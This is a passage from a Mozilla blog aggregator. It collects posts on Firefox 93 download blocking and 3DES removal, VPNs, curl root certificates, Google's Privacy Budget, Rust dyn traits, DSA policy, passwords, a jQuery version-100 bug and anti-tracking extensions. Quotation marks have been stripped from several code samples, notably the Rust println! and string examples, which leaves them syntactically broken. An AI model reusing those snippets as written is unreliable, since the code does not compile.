  • block downloads in sandboxed iframes, unless the iframe is explicitly annotated with the allow-downloads attribute.

 

Blocking Downloads relying on insecure connections

Downloading files via an insecure HTTP connection, generally exposes a major security risk because data transferred by the regular HTTP protocol is unprotected and transferred in clear text, such that attackers are able to view, steal, or even tamper with the transmitted data. Put differently, downloading a file over an insecure connection allows an attacker to replace the file with malicious content which, when opened, can ultimately lead to an entire system compromise.

 

Firefox 93 prompting the end user about a ‘Potential security risk’ when downloading a file using an insecure connection.

 

As illustrated in the Figure above, if Firefox detects such an insecure download, it will initially block the download and prompt you signalling the Potential security risk. This prompt allows you to either stop the download and Remove the file, or alternatively grants you the option to override the decision and download the file anyway, though it’s safer to abandon the download at this point.

 

Blocking Downloads in sandboxed iframes

The Inline Frame sandbox attribute is the preferred way to lock down capabilities of embedded third-party content. Currently, even with the sandbox attribute set, malicious content could initiate a drive-by download, prompting the user to download malicious files. Unless the sandboxed content is explicitly annotated with the ‘allow-downloads’ attribute, Firefox will  protect you against such drive-by downloads. Put differently, downloads initiated from sandboxed contexts without this attribute will be canceled silently in the background without any user browsing disruption.

 

It’s Automatic!

As a Firefox user, you can benefit from the additionally provided security mechanism as soon as your Firefox auto-updates to version 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 protects against Insecure Downloads appeared first on Mozilla Security Blog.

Mozilla Security BlogSecuring Connections: Disabling 3DES in Firefox 93

As part of our continuing work to ensure that Firefox provides secure and private network connections, it periodically becomes necessary to disable configurations or even entire protocols that were once thought to be secure, but no longer provide adequate protection. For example, last year, early versions of the Transport Layer Security (TLS) protocol were disabled by default.

One of the options that goes into configuring TLS is the choice of which encryption algorithms to enable. That is, which methods are available to use to encrypt and decrypt data when communicating with a web server?

Goodbye, 3DES

3DES (“triple DES”, an adaptation of DES (“Data Encryption Standard”)) was for many years a popular encryption algorithm. However, as attacks against it have become stronger, and as other more secure and efficient encryption algorithms have been standardized and are now widely supported, it has fallen out of use. Recent measurements indicate that Firefox encounters servers that choose to use 3DES about as often as servers that use deprecated versions of TLS.

As long as 3DES remains an option that Firefox provides, it poses a security and privacy risk. Because it is no longer necessary or prudent to use this encryption algorithm, it is disabled by default in Firefox 93.

Addressing Compatibility

As with disabling obsolete versions of TLS, deprecating 3DES may cause compatibility issues. We hypothesize that the remaining uses of 3DES correspond mostly to outdated devices that use old cryptography and cannot be upgraded. It may also be that some modern servers inexplicably (perhaps unintentionally) use 3DES when other more secure and efficient encryption algorithms are available. Disabling 3DES by default helps with the latter case, as it forces those servers to choose better algorithms. To account for the former situation, Firefox will allow 3DES to be used when deprecated versions of TLS have manually been enabled. This will protect connections by default by forbidding 3DES when it is unnecessary while allowing it to be used with obsolete servers if necessary.

The post Securing Connections: Disabling 3DES in Firefox 93 appeared first on Mozilla Security Blog.

The Mozilla BlogDo you need a VPN at home? Here are 5 reasons you might.

You might have heard of VPNs — virtual private networks — at some point, and chalked them up to something only “super techy” people or hackers would ever use. At this point in the evolution of online life, however, VPNs have become more mainstream, and anyone may have good reasons to use one. VPNs are beneficial for added security when you’re connected to a public wifi network, and you might also want to use a VPN at home when you’re online as well. Here are five reasons to consider using a VPN at home.

Stop your ISP from watching you 

Did you know that when you connect to the internet at home through your internet service provider (ISP), it can track what you do online? Your ISP can see every site you visit and track things like how often you visit sites and how long you’re on them. That’s rich personal — and private — information you’re giving away to your ISP every time you connect to the internet at home. The good news is that a VPN at home can prevent your ISP from snooping on you by encrypting your traffic before the ISP can see it.

How do VPNs work?

Get answers to nine common questions about VPNs

Secure yourself on a shared building network

Some apartment buildings offer wifi as an incentive to residents, but how secure is the network? Do you even know all your neighbors, let alone know if they’re true crime podcast fanatics or even actual cyber criminals? Do you know for sure that your landlord or building manager isn’t tracking your internet traffic? If you’re concerned about any of that, a VPN can add extra security on your shared network by encrypting your traffic between you and your VPN provider so that no one on your local network can decipher or modify it.

Block nosy housemates

Similar to a shared apartment network, sharing an internet connection could leave your internet traffic vulnerable to snooping by housemates or any other untrustworthy person who accesses your network. A VPN at home can help by encrypting your traffic so they can’t see it.

Increase remote work security

Working remotely, at least part of the time, is the new normal for millions of office workers. Some employers offer a VPN for home workers and some even require it. A VPN prevents an unknown entity from monitoring your traffic through network “sniffing.” If you work with confidential or sensitive information online, a VPN should be essential to your remote work setup.

Explore the world at home

There are some fun reasons to use a VPN at home, too. You can get access to shows, websites and livestreams in dozens of different countries. See what online shopping is like if you were in a different locale and get the feeling of gaming from somewhere new. 

The post Do you need a VPN at home? Here are 5 reasons you might. appeared first on The Mozilla Blog.

Cameron KaiserTenFourFox FPR32 SPR5 available (the last official build)

TenFourFox Feature Parity Release 32 Security Parity Release 5 "32.5" is available for testing (downloads, hashes). Aside from the announced change with .inetloc and .webloc handling, this release also updates the ATSUI font blacklist and includes the usual security updates. It will go live Monday evening Pacific as usual assuming no issues.

As stated previously, this is the last official build before TenFourFox goes into hobby mode; version checking is therefore disabled in this release since there will be no new official build to check for. I know I keep teasing a future consolidated post about how users who want to continue using it can get or make their own builds, but I want to update the docs and FAQ first, plus actually give you something new to test your build out (in this case it's going to be switching the certificate and security base over to Firefox 91ESR from 78ESR). There are already some options already apart from the official method and we'll discuss those, but if you yourself are gearing up to offer public builds or toolkits, feel free to make this known in the comments. Work is a little hairy this month but I want to get to this in the next couple weeks.

Cameron Kaisercurl, Let's Encrypt and Apple laziness

The built-in version of curl on any Power Mac version of OS X will not be capable of TLS 1.1 or higher, so most of you who need it will have already upgraded to an equivalent with MacPorts. However, even for later Intel Macs that are ostensibly supported -- including my now legacy MacBook Air with Mojave I keep around for running 32-bit Intel -- the expiration of one of Let's Encrypt's root certificates yesterday will suddenly mean curl may suddenly cease connecting to TLS sites with Let's Encrypt certificates. Yesterday I was trying to connect to one of my own Floodgap sites, unexpectedly got certificate errors I wasn't seeing in TenFourFox or mainline Firefox, and, after a moment of panic, suddenly realized what had happened. While you can use -k to ignore the error, that basically defeats the entire idea of having a certificate to start with.

The real hell of it is that Mojave 10.14 is still technically supported by Apple, and you would think updating the curl root certificate store would be an intrinsic part of security updates, but you'd be wrong. The issue with old roots even affects Safari on some Monterey betas, making the best explanation more Apple laziness than benign neglect. Firefox added this root ages ago and so did TenFourFox.

If you are using MacPorts curl, which is (IMHO) the best solution on Power Macs due to Ken's diligence but is still a dandy alternative to Homebrew on Intel Macs, the easiest solution is to ensure curl-ca-bundle is up-to-date. Homebrew (and I presume Tigerbrew, for 10.4) can do brew install curl-ca-bundle, assuming your installation is current.

However, I use the built-in curl on the Mojave MacBook Air. Ordinarily I would just do an in-place update of the root certificate bundle, as I did on my 10.4 G5 before I started using a self-built curl, but thanks to System Integrity Protection you're not allowed to do that anymore even as root. Happily, the cURL maintainers themselves have a downloadable root certificate store which is periodically refreshed. Download that, put it somewhere in your home directory, and in your .login or .profile or whatever, set CURL_CA_BUNDLE to its location (on my system, I have a ~/bin directory, so I put it there and set it to /Users/yourname/bin/cacert.pem).

The Mozilla BlogMiracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we will be sharing the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution each week.

Here’s what made it to the Top Shelf for the week of September 27, 2021, in no particular order.

From Licorice Pizza to McRibs to #NationalCoffeeDay, food-related topics boiled to the top of the trends this week on Twitter, though not every one of them is actually food… we’ll leave you to decide which!

Pocket Joy List Project

The Pocket Joy List Project

The stories, podcasts, poems and songs we always come back to

The post Miracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week appeared first on The Mozilla Blog.

The Mozilla BlogAnalysis of Google’s Privacy Budget Proposal

Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be unique (e.g., how many people are running Firefox Nightly, live in North Dakota, have an M1 Mac and a big monitor, etc.)

This post discusses a proposal by Google to address fingerprinting called the Privacy Budget. The idea behind the Privacy Budget is to estimate the amount of information revealed by each piece of fingerprinting information (called a “fingerprinting surface”, e.g., screen resolution) and then limit the total amount of that information a site can obtain about you. Once the site reaches that limit (the “budget”), further attempts to learn more about you would fail, perhaps by reporting an error or returning a generic value. This idea has been getting a fair amount of attention and has been proposed as a potential privacy mitigation in some in-development W3C specifications.

While this seems like an attractive idea, our detailed analysis of the proposal raises questions about its feasibility.  We see a number of issues:

  • Estimating the amount of information revealed by a single surface is quite difficult. Moreover, because some values will be much more common than others, any total estimate is misleading. For instance, the Chrome browser has many users and so learning someone uses Chrome is not very identifying; by contrast, learning that someone uses Firefox Nightly is quite identifying because there are few Nightly users.
  • Even if we are able to set a common value for the budget, it is unclear how to determine whether a given set of queries exceeds that value. The problem is that these queries are not independent and so you can’t just add up each query. For instance, screen width and screen height are highly correlated and so once a site has queried one, learning the other is not very informative.
  • Enforcement is likely to lead to surprising and disruptive site breakage because sites will exceed the budget and then be unable to make API calls which are essential to site function. This will be exacerbated because the order in which the budget is used is nondeterministic and depends on factors such as the network performance of various sites, so some users will experience breakage and others will not.
  • It is possible that the privacy budget mechanism itself can be used for tracking by exhausting the budget with a particular pattern of queries and then testing to see which queries still work (because they already succeeded).

While we understand the appeal of a global solution to fingerprinting — and no doubt this is the motivation for the Privacy Budget idea appearing in specifications — the underlying problem here is the large amount of fingerprinting-capable surface that is exposed to the Web. There does not appear to be a shortcut around addressing that. We believe the best approach is to minimize the easy-to-access fingerprinting surface by limiting the amount of information exposed by new APIs and gradually reducing the amount of information exposed by existing APIs. At the same time, browsers can and should attempt to detect abusive patterns by sites and block those sites, as Firefox already does.

This post is part of a series of posts analyzing privacy-preserving advertising proposals.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

The post Analysis of Google’s Privacy Budget Proposal appeared first on The Mozilla Blog.

Niko MatsakisDyn async traits, part 2

In the previous post, we uncovered a key challenge for dyn and async traits: the fact that, in Rust today, dyn types have to specify the values for all associated types. This post is going to dive into more background about how dyn traits work today, and in particular it will talk about where that limitation comes from.

Today: Dyn traits implement the trait

In Rust today, assuming you have a “dyn-safe” trait DoTheThing , then the type dyn DoTheThing implements Trait. Consider this trait:

trait DoTheThing {
	fn do_the_thing(&self);
}

impl DoTheThing for String {
    fn do_the_thing(&self) {
        println!({}, self);
    }
}

And now imagine some generic function that uses the trait:

fn some_generic_fn<T: ?Sized + DoTheThing>(t: &T) {
	t.do_the_thing();
}

Naturally, we can call some_generic_fn with a &String, but — because dyn DoTheThing implements DoTheThing — we can also call some_generic_fn with a &dyn DoTheThing:

fn some_nongeneric_fn(x: &dyn DoTheThing) {
    some_generic_fn(x)
}

Dyn safety, a mini retrospective

Early on in Rust, we debated whether dyn DoTheThing ought to implement the trait DoTheThing or not. This was, indeed, the origin of the term “dyn safe” (then called “object safe”). At the time, I argued in favor of the current approach: that is, creating a binary property. Either the trait was dyn safe, in which case dyn DoTheThing implements DoTheThing, or it was not, in which case dyn DoTheThing is not a legal type. I am no longer sure that was the right call.

What I liked at the time was the idea that, in this model, whenever you see a type like dyn DoTheThing, you know that you can use it like any other type that implements DoTheThing.

Unfortunately, in practice, the type dyn DoTheThing is not comparable to a type like String. Notably, dyn types are not sized, so you can’t pass them around by value or work with them like strings. You must instead always pass around some kind of pointer to them, such as a Box<dyn DoTheThing> or a &dyn DoTheThing. This is “unusual” enough that we make you opt-in to it for generic functions, by writing T: ?Sized.

What this means is that, in practice, generic functions don’t accept dyn types “automatically”, you have to design for dyn explicitly. So a lot of the benefit I envisioned didn’t come to pass.

Static versus dynamic dispatch, vtables

Let’s talk for a bit about dyn safety and where it comes from. To start, we need to explain the difference between static dispatch and virtual (dyn) dispatch. Simply put, static dispatch means that the compiler knows which function is being called, whereas dyn dispatch means that the compiler doesn’t know. In terms of the CPU itself, there isn’t much difference. With static dispatch, there is a “hard-coded” instruction that says “call the code at this address”1; with dynamic dispatch, there is an instruction that says “call the code whose address is in this variable”. The latter can be a bit slower but it hardly matters in practice, particularly with a successful prediction.

When you use a dyn trait, what you actually have is a vtable. You can think of a vtable as being a kind of struct that contains a collection of function pointers, one for each method in the trait. So the vtable type for the DoTheThing trait might look like (in practice, there is a bit of extra data, but this is close enough for our purposes):

struct DoTheThingVtable {
    do_the_thing: fn(*mut ())
}

Here the do_the_thing method has a corresponding field. Note that the type of the first argument ought to be &self, but we changed it to *mut (). This is because the whole idea of the vtable is that you don’t know what the self type is, so we just changed it to “some pointer” (which is all we need to know).

When you create a vtable, you are making an instance of this struct that is tailored to some particular type. In our example, the type String implements DoTheThing, so we might create the vtable for String like so:

static Vtable_DoTheThing_String: &DoTheThingVtable = &DoTheThingVtable {
    do_the_thing: <String as DoTheThing>::do_the_thing as fn(*mut ())
    //            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    //            Fully qualified reference to `do_the_thing` for strings
};

You may have heard that a &dyn DoTheThing type in Rust is a wide pointer. What that means is that, at runtime, it is actually a pair of two pointers: a data pointer and a vtable pointer for the DoTheThing trait. So &dyn DoTheThing is roughly equivalent to:

(*mut (), &’static DoTheThingVtable)

When you cast a &String to a &dyn DoTheThing, what actually happens at runtime is that the compiler takes the &String pointer, casts it to *mut (), and pairs it with the appropriate vtable. So, if you have some code like this:

let x: &String = &Hello, Rustaceans.to_string();
let y: &dyn DoTheThing = x;

It winds up “desugared” to something like this:

let x: &String = &Hello, Rustaceans.to_string();
let y: (*mut (), &static DoTheThingVtable) = 
    (x as *mut (), Vtable_DoTheThing_String);

The dyn impl

We’ve seen how you create wide pointers and how the compiler represents vtables. We’ve also seen that, in Rust, dyn DoTheThing implements DoTheThing. You might wonder how that works. Conceptually, the compiler generates an impl where each method in the trait is implemented by extracting the function pointer from the vtable and calling it:

impl DoTheThing for dyn DoTheThing {
    fn do_the_thing(self: &dyn DoTheThing) {
        // Remember that `&dyn DoTheThing` is equivalent to
        // a tuple like `(*mut (), &’static DoTheThingVtable)`:
        let (data_pointer, vtable_pointer) = self;

        let function_pointer = vtable_pointer.do_the_thing;
        function_pointer(data_pointer);
    }
}

In effect, when we call a generic function like some_generic_fn with T = dyn DoTheThing, we monomorphize that call exactly like any other type. The call to do_the_thing is dispatched against the impl above, and it is that special impl that actually does the dynamic dispatch. Neat.

Static dispatch permits monomorphization

Now that we’ve seen how and when vtables are constructed, we can talk about the rules for dyn safety and where they come from. One of the most basic rules is that a trait is only dyn-safe if it contains no generic methods (or, more precisely, if its methods are only generic over lifetimes, not types). The reason for this rule derives directly from how a vtable works: when you construct a vtable, you need to give a single function pointer for each method in the trait (or, perhaps, a finite set of function pointers). The problem with generic methods is that there is no single function pointer for them: you need a different pointer for each type that they’re applied to. Consider this example trait, PrintPrefixed:

trait PrintPrefixed {
    fn prefix(&self) -> String;
    fn apply<T: Display>(&self, t: T);
}

impl PrintPrefixed for String {
    fn prefix(&self) -> String {
        self.clone()
    }
    fn apply<T: Display>(&self, t: T) {
        println!({}: {}, self, t);
    }
}

What would a vtable for String as PrintPrefixed look like? Generating a function pointer for prefix is no problem, we can just use <String as PrintPrefixed>::prefix. But what about apply? We would have to include a function pointer for <String as PrintPrefixed>::apply<T>, but we don’t know yet what the T is!

In contrast, with static dispatch, we don’t have to know what T is until the point of call. In that case, we can generate just the copy we need.

Partial dyn impls

The previous point shows that a trait can have some methods that are dyn-safe and some methods that are not. In current Rust, this makes the entire trait be “not dyn safe”, and this is because there is no way for us to write a complete impl PrintPrefixed for dyn PrintPrefixed:

impl PrintPrefixed for dyn PrintPrefixed {
    fn prefix(&self) -> String {
        // For `prefix`, no problem:
        let prefix_fn = /* get prefix function pointer from vtable */;
        prefix_fn();
    }
    fn apply<T: Display>(&self, t: T) {
        // For `apply`, we can’t handle all `T` types, what field to fetch?
        panic!(No way to implement apply)
    }
}

Under the alternative design that was considered long ago, we could say that a dyn PrintPrefixed value is always legal, but dyn PrintPrefixed only implements the PrintPrefixed trait if all of its methods (and other items) are dyn safe. Either way, if you had a &dyn PrintPrefixed, you could call prefix. You just wouldn’t be able to use a dyn PrintPrefixed with generic code like fn foo<T: ?Sized + PrintPrefixed>.

(We’ll return to this theme in future blog posts.)

If you’re familiar with the “special case” around trait methods that require where Self: Sized, you might be able to see where it comes from now. If a method has a where Self: Sized requirement, and we have an impl for a type like dyn PrintPrefixed, then we can see that this impl could never be called, and so we can omit the method from the impl (and vtable) altogether. This is awfully similar to saying that dyn PrintPrefixed is always legal, because it means that there only a subset of methods that can be used via virtual dispatch. The difference is that dyn PrintPrefixed: PrintPrefixed still holds, because we know that generic code won’t be able to call those “non-dyn-safe” methods, since generic code would have to require that T: ?Sized.

Associated types and dyn types

We began this saga by talking about associated types and dyn types. In Rust today, a dyn type is required to specify a value for each associated type in the trait. For example, consider a simplified Iterator trait:

trait Iterator {
    type Item;

    fn next(&mut self) -> Option<Self::Item>;
}

This trait is dyn safe, but if you actually have a dyn in practice, you would have to write something like dyn Iterator<Item = u32>. The impl Iterator for dyn Iterator looks like:

impl<T> Iterator for dyn Iterator<Item = T> {
    type Item = T;
    
    fn next(&mut self) -> Option<T> {
        let next_fn = /* get next function from vtable */;
        return next_fn(self);
    }
}

Now you can see why we require all the associated types to be part of the dyn type — it lets us write a complete impl (i.e., one that includes a value for each of the associated types).

Conclusion

We covered a lot of background in this post:

  • Static vs dynamic dispatch, vtables
  • The origin of dyn safety, and the possibility of “partial dyn safety”
  • The idea of a synthesized impl Trait for dyn Trait

Mozilla Open Policy & Advocacy BlogAddressing gender-based online harms in the DSA

Last year the European Commission published the Digital Services Act (DSA) proposal, a draft law that seeks to set a new standard for platform accountability. We welcomed the draft law when it was published, and since then we have been working to ensure it is strengthened and elaborated as it proceeds through the mark-up stage. Today we’re confirming our support for a new initiative that focuses on improving the DSA with respect to gender-based online harm, an objective that aligns with our policy vision and the Mozilla Manifesto addendum.

An overarching focus of our efforts to improve the DSA have focused on the draft law’s risk assessment and auditing provisions. In order to structurally improve the health of the internet ecosystem, we need laws that compel platforms to meaningfully assess and mitigate the systemic risks stemming from the design and operation of their services. While the draft DSA is a good start, it falls short when it comes to specifying the types of systemic risks that platforms need to address.

One such area of systemic risk that warrants urgent attention is gender-based online harm. Women and non-binary people are subject to massive and persistent abuse online, with 74% of women reporting experiencing some form of online violence in the EU in 2020. Women from marginalised communities, including LGBTQ+ people, women of colour, and Black women in particular, are often disproportionately targeted with online abuse.

In our own platform accountability research this untenable reality has surfaced time and time again. For instance, in one testimony submitted to Mozilla Foundation as part of our YouTube Regrets campaign, one person wrote “In coming out to myself and close friends as transgender, my biggest regret was turning to YouTube to hear the stories of other trans and queer people. Simply typing in the word “transgender” brought up countless videos that were essentially describing my struggle as a mental illness and as something that shouldn’t exist. YouTube reminded me why I hid in the closet for so many years.”

Another story read: “I was watching a video game series on YouTube when all of a sudden I started getting all of these anti-women, incel and men’s rights recommended videos. I ended up removing that series from my watch history and going through and flagging those bad recommendations as ‘not interested’. It was gross and disturbing. That stuff is hate, and I really shouldn’t have to tell YouTube that it’s wrong to promote it.”

Indeed, further Mozilla research into this issue on YouTube has underscored the role of automated content recommender systems in exacerbating the problem, to the extent that they can recommend videos that violate the platform’s very own policies, like hate speech.

This is not only a problem on YouTube, but on the web at large. And while the DSA is not a silver bullet for addressing gender-based online harm, it can be an important part of the solution. To underscore that belief, we – as the Mozilla Foundation – have today signed on to a joint Call with stakeholders from across the digital rights, democracy, and womens’ rights communities. This Call aims to invigorate efforts to improve the DSA provisions around risk assessment and management, and ensure lawmakers appreciate the scale of gender-based online harm that communities face today.

This initiative complements other DSA-focused engagements that seek to address gender-based online harms. In July, we signaled our support for the The Who Writes the Rules campaign, and we stand in solidarity with the just-published testimonies of gender-based online abuse faced by the initiative’s instigators.

The DSA has been rightly-billed as an accountability game-changer. Lawmakers owe it to those who suffer gender-based online harm to ensure those systemic risks are properly accounted for.

The full text of the Call can be read here.

The post Addressing gender-based online harms in the DSA appeared first on Open Policy & Advocacy.

The Mozilla BlogSuperhero passwords may be your kryptonite wherever you go online

A password is like a key to your house. In the online world, your password keeps your house of personal information safe, so a super strong password is like having a superhero in a fight of good vs. evil. In recognition of Cybersecurity Awareness month, we revisited our “Princesses make terrible passwords for Disney+ and every other account,” and took a look to see how fortified superhero passwords are in the fight against hackers and breaches. According to haveibeenpwned.com, take a look at the how many times these superhero passwords have showed up in breached datasets:

And if you thought maybe their real identities might make for a better password, think again!

Lucky for you, we’ve got a family of products from a company you can trust, Mozilla, a mission-driven company with a 20-year track record of fighting for online privacy and a healthier internet. Here are your best tools in the fight against hackers and breaches:

Keep passwords safe from cyber threats with this new Firefox super power on Firefox on Android

This Cybersecurity Awareness month, we added new features for Firefox on Android, to keep your passwords safe. You might not have every password memorized by heart, nor do you need to when you use Firefox. With Firefox, users will be able to seamlessly access Firefox saved passwords. This means you can use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. It’s that seamless and simple. Plus, you can also use biometric security, such as your face or fingerprint, to unlock the app and safely access your accounts. These new features will be available next Tuesday with the latest Firefox on Android release. Here are more details on the upcoming new features:

  • Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and you can use it on both mobile and desktop.  
<figcaption>Create and add new passwords</figcaption>
  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
<figcaption>Sync all your passwords across desktop and mobile devices</figcaption>
  • Unlock your passwords with your fingerprint and face – Now only you can safely open your accounts when you use biometric security such as your fingerprint or face to unlock the access page to your logins and passwords.

Forget J.A.R.V.I.S, keep informed of hacks and breaches with Firefox Monitor 

Avoid your spidey senses from tingling every time you hear about hacks and breaches by signing up with Firefox Monitor. You’ll be able to keep an eye on your accounts once you sign up for Firefox Monitor and get alerts delivered to your email whenever there’s been a data breach or if your accounts have been hacked.

X Ray vision won’t work on a Virtual Private Network like Mozilla VPN

One of the reasons people use a Virtual Private Network (VPN), an encrypted connection that serves as a tunnel between your computer and VPN server, is to protect themselves whenever they use a public WiFi network. It sounds harmless, but public WiFi networks can be like a backdoor for hackers. With a VPN, you can rest assured you’re safe whenever you use the public WiFi network at your local cafe or library. Find and use a trusted VPN provider like our Mozilla VPN, a fast and easy-to-use VPN service. Thousands of people have signed up to subscribe to our Mozilla VPN, which provides encryption and device-level protection of your connection and information when you are on the Web.


How did we get these numbers? Unfortunately, we don’t have a J.A.R.V.I.S, so we looked these up in haveipbeenpwned.com. We couldn’t access any data files, browse lists of passwords or link passwords to logins — that info is inaccessible and kept secure — but we could look up random passwords manually. Current numbers on the site may be higher than at time of publication as new datasets are added to HIBP. Alas, data breaches keep happening. There’s no time like the present to make sure all your passwords are built like Ironman.

The post Superhero passwords may be your kryptonite wherever you go online appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgMDN Web Docs at Write the Docs Prague 2021

The MDN Web Docs team is pleased to sponsor Write the Docs Prague 2021, which is being held remotely this year. We’re excited to join hundreds of documentarians to learn more about collaborating with writers, developers, and readers to make better documentation. We plan to take part in all that the conference has to offer, including the Writing Day, Job Fair, and the virtual hallway track.

In particular, we’re looking forward to taking part in the Writing Day on Sunday, October 3, where we’ll be joining our friends from Open Web Docs (OWD) to work on MDN content updates together. We’re planning to invite our fellow conference attendees to take part in making open source documentation. OWD is also sponsoring ​​Write the Docs; read their announcement to learn more.

The post MDN Web Docs at Write the Docs Prague 2021 appeared first on Mozilla Hacks - the Web developer blog.

Mike TaylorHow to delete your jQuery Reject Plugin in 1 easy step.

In my last post on testing Chrome version 100, I encouraged everyone to flip on that flag and report bugs. It’s with a heavy heart that I announce that Ian Kilpatrick did so, and found a bug.

(⌣_⌣”)

The predictable bug is that parks.smcgov.org will tell you your browser is out of date, and recommend that you upgrade it via a modal straight out of the year 2009.

screenshot of a modal telling you to upgrade your browser, with a farmville image because that was popular in 2009?

(Full Disclosure: I added the FarmVille bit so you can get back into a 2009 headspace, don’t sue me Zynga).

The bug is as follows:

r.versionNumber = parseFloat(r.version, 10) || 0;
var minorStart = 1;

if (r.versionNumber < 100 && r.versionNumber > 9) {
  minorStart = 2;
}

r.versionX = r.version !== x ? r.version.substr(0, minorStart) : x;
r.className = r.name + r.versionX;

Back when this was written, a version 100 was unfathomable (or more likely, the original authors were looking forward to the chaos of a world already dealing with the early effects of climate change, and now we have to deal with this?, a mere 11 years later) so the minorStart offset approach was perhaps reasonable.

There’s a few possible fixes here, as I see it:

I. Kick the can down the road a bit more:

if (r.versionNumber < 1000 && r.versionNumber > 99) {
  minorStart = 3;
}

I don’t really plan on being alive when Chrome 999 comes out, so.

II. Kick the can down the road like, way further:

r.versionX = Math.trunc(parseFloat(r.version)) || x;

According to jakobkummerow, this should work until browsers hit version 9007199254740991 (aka Number.MAX_SAFE_INTEGER in JS).

III. (Recommended) Just remove this script entirely from your site. It’s outlived its purpose.

Also, if you happen to work on any of the following 1936 sites using this script, you know what to do (pick option Roman numeral 3, just to be super clear).

Data@MozillaThis Week in Glean: Announcement: Glean.js v0.19.0 supports Node.js

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)


From the start, the Glean JavaScript SDK (Glean.js) was conceptualized as a JavaScript telemetry library for diverse JavaScript environments. When we built the proof-of-concept, we tested that idea out and created a library that worked in Qt/QML apps, websites, web extensions, Node.js servers and CLIs, and Electron apps.

However, the stakes are completely different when implementing a proof-of-concept library and a library to be used in production environments. Whereas for the proof-of-concept we wanted to try out as many platforms as possible, for the actual Glean.js library we want to minimize unnecessary work and focus on perfecting the features our users will actively benefit from. That meant, up until a few weeks ago, Glean.js supported browser extensions and Qt/QML apps. Today, that means it also supports Node.js environments.

🎉 (Of course, it’s always exciting to implement new features).

If you would also like to start using Glean.js in your Node.js project today, checkout the “Adding Glean to your JavaScript project” guide over in the Glean book, but note that there is one caveat: the Node.js implementation does not contain persistent storage, which means every time the app is restarted the state is reset and Glean runs as if it were the first run ever of the app. In the spirit of not implementing things that are not required, we spoke to the users that requested Node.js support and concluded that for their use case persistent storage was not necessary. If your use case does require that, leave a comment over on Bug 1728807 and we will re-prioritize that work.

:brizental

Firefox Add-on ReviewsTop anti-tracking extensions

The truth of modern tracking is that it happens in so many different and complex ways it’s practically impossible to ensure absolute tracking protection. But that doesn’t mean we’re powerless against personal data harvesters attempting to trace our every online move. There are a bunch of browser extensions that can give you tremendous anti-tracking advantages… 

Privacy Badger

Sophisticated and effective anti-tracker that doesn’t require any setup whatsoever. Simply install Privacy Badger and right away it begins the work of finding the most hidden types of tackers on the web. 

Privacy Badger actually gets better at tracker blocking the more you use it. As you naturally navigate around the web and encounter new types of hidden trackers, Privacy Badger will find and block them—unreliant on externally maintained block lists or other methods that may lag behind the latest trends in sneaky tracking. Privacy Badger also automatically removes tracking codes from outgoing links on Facebook and Google. 

Decentraleyes

Another strong privacy protector that works well right out of the box, Decentraleyes effectively halts web page tracking requests from reaching third party content delivery networks (i.e. ad tech). 

A common issue with other extensions that try to block tracking requests is they also sometimes break the page itself, which is obviously not a great outcome. Decentraleyes solves this unfortunate side effect by injecting inert local files into the request, which protects your privacy (by distributing generic data instead of your personal info) while ensuring web pages don’t break in the process. Decentraleyes is also designed to work well with other types of content blockers like ad blockers.

ClearURLs

Ever noticed those long tracking codes that often get tagged to the end of your search result links or URLs on product pages from shopping sites? All that added guck to the URL is designed to track how you interact with the link. ClearURLs automatically removes the tracking clutter from links—giving you cleaner links and more privacy. 

Other key features include…

  • Clean up multiple URLs at once
  • Block hyperlink auditing (i.e. “ping tracking”; a method websites use to track clicks)
  • Block ETag tracking (i.e. “entity tags”; a tracking alternative to cookies)
  • Prevent Google and Yandex from rewriting search results to add tracking elements
  • Block some common ad domains (optional)

Disconnect

Strong privacy tool that fares well against hidden trackers used by some of the biggest data trackers in the game like Google, Facebook, Twitter and others, Disconnect also provides the benefit of significantly speeding up page loads simply by virtue of blocking all the unwanted tracking traffic. 

Once installed, you’ll find a Disconnect button in your browser toolbar. Click it when visiting any website to see the number of trackers blocked (and where they’re from). You can also opt to unblock anything you feel you might need in your browsing experience. 

Cookie AutoDelete

Take control of your cookie trail with Cookie AutoDelete. Set it so cookies are automatically deleted every time you close a tab, or create safelists for select sites you want to preserve cookies. 

After installation, you must enable “Auto-clean” for the extension to automatically wipe away cookies. This is so you first have an opportunity to create a custom safelist, should you choose, before accidentally clearing away cookies you might want to keep. 

There’s not much you have to do once you’ve got your safelist set, but clicking the extension’s toolbar button opens a pop-up menu with a few convenient options, like the ability to wipe away cookies from open tabs or clear cookies for just a particular domain.

<figcaption>Cookie AutoDelete’s pop-up menu gives you accessible cookie control wherever you go online. </figcaption>

Firefox Multi-Account Containers

Do you need to be simultaneously logged in to multiple accounts on the same platform, say for instance juggling various accounts on Google, Twitter, or Reddit? Multi-Account Containers can make your life a whole lot easier by helping you keep your many accounts “contained” in separate tabs so you can easily navigate between them without a need to constantly log in/out. 

By isolating your identities through containers, your browsing activity from one container isn’t correlated to another—making it far more difficult for these platforms to track and profile your holistic browsing behavior. 

Facebook Container

